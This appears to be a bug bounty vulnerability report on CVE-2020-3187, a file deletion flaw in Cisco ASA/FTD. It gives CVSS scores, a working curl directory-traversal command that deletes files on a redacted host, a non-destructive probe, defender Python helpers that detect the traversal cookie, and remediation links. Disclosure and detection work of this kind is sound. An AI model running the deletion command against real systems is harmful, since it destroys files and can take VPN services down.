9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%
Hi @U.S. Dept Of Defense, I found a host <https://██████> which is running on the web services interface of Cisco ASA/FTD and it is vulnerable to CVE-2020-3187 - Unauthenticated arbitrary file deletion in Cisco ASA/FTD. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences. An exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after the exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system.
Proof of Concept:
Now we know that CVE-2020-3187 (Unauthenticated arbitrary file deletion in Cisco ASA/FTD) allows the attacker to view or delete arbitrary files on the targeted system.
With this we can delete files. For example, the logo file present on the server at <https://████████/+CSCOU+/csco_logo.gif> can be deleted by the following steps.
This can be done by sending a curl request as: curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" <https://███/+CSCOE+/session_password.html>
To delete this, just run the following command in your terminal.
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://█████████/+CSCOE+/session_password.html
If that did not work (sometimes logo.gif/png has permission issues), try this: <https://█████/+CSCOE+/blank.html>
You can also delete the file "/+CSCOE+/blank.html" (an empty HTML file); sometimes there is a permission issue with the custom logo file (logo.gif), so we might not be able to delete it, but we can delete other files.
Warning: This can lead to a denial of service (DoS) on the VPN by deleting the Lua source code files from the file system, which will break the WebVPN interface until the device is rebooted.
Now, I haven't deleted the logo file because I didn't want to cause any damage, so I used another method which can help us confirm that the target is vulnerable without causing damage: just check if the /+CSCOE+/session_password.html endpoint exists. If it gives a "200 OK" status, then it should be vulnerable, because this affected endpoint has been removed from the patched versions.
I sent a curl request to check and it gave 200 OK as shown below:
/+CSCOE+/session_password.html -> 200 = Vulnerable
/+CSCOE+/session_password.html -> 404 = Patched
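The non-destructive check and the exploitation pattern above, turned into defender-side helpers (an added example, not code from the report or from Cisco): classify_patch_status maps the 200/404 observed for /+CSCOE+/session_password.html to an asset-inventory verdict, and cookie_has_traversal flags a request whose token cookie carries a directory traversal segment, for WAF or log review. The function names and the sample Cookie headers are constructed for this example.

```python
import re
from urllib.parse import unquote

# Endpoint the report uses as a non-destructive indicator: present (200) on
# unpatched builds, removed (404) on fixed releases.
PROBE_PATH = "/+CSCOE+/session_password.html"


def classify_patch_status(status: int) -> str:
    """Turn the status observed for PROBE_PATH into an inventory verdict."""
    if status == 200:
        return "vulnerable"
    if status == 404:
        return "patched"
    return "unknown"  # redirect, auth wall or error: review by hand


# A '..' path segment with either slash style, anywhere in the value.
_TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


def parse_cookies(header: str) -> dict:
    """Minimal Cookie header parser: 'name=value' pairs separated by ';'."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def cookie_has_traversal(cookie_header: str, name: str = "token") -> bool:
    """True if the named cookie's value contains a directory traversal
    segment after percent-decoding (the pattern shown in the report)."""
    value = unquote(parse_cookies(cookie_header).get(name, ""))
    return bool(_TRAVERSAL.search(value))


# Constructed sample Cookie headers, not captured traffic.
SAMPLE_COOKIES = [
    "token=abc123def456; lang=en",
    "token=../+CSCOU+/csco_logo.gif",
    "lang=en; token=sess.id.with.dots",
]


def flag_suspicious(headers):
    """Return indexes of headers whose token cookie looks like traversal."""
    return [i for i, h in enumerate(headers) if cookie_has_traversal(h)]
```

A status other than 200 or 404 is deliberately reported as unknown rather than guessed, since a redirect to a login page or a WAF response says nothing about the patch level.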
Mitigation/Remediation Actions:
Upgrade the ASA software version per the referenced advisory. This advisory is available at the following link:
<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43>
Reference:
<https://twitter.com/aboul3la/status/1286809567989575685>
<https://medium.com/@parasarora06/hunting-for-cve-2020-3187-2020-3452-9f0dcc66f4d8>
<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43>
<http://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html>
High - This vulnerability allows the attacker to delete files within the web services file system.